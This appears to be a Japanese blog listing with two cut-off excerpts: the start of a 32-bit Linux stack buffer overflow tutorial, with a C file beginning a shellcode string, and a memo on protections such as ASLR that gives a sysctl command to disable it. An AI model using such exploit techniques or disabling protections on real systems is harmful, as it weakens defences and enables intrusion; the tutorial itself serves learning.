*linux32ビット 1.1: 最も基本的なスタックバッファオーバーフロー 実行条件: ・DEP無効 ・ASLR無効 ・CANARY無効 *セキュリティ機構のおおまかな解説はここから aithea.hatenablog.com //bof1.c #include <stdio.h> #include <string.h> char *shellcode = "\x31\xc0\x50\x68\x</string.h></stdio.h>…

どれがどれだかよくわからなくなるのでメモ。 ①ASLR 実行時のスタック・ヒープ・共有ライブラリなどのアドレスをランダム化します。アドレスが予測できなくなるので攻撃は難しくなります。これを無効にするには「sudo sysctl -w kernel.randomize_va_space=0…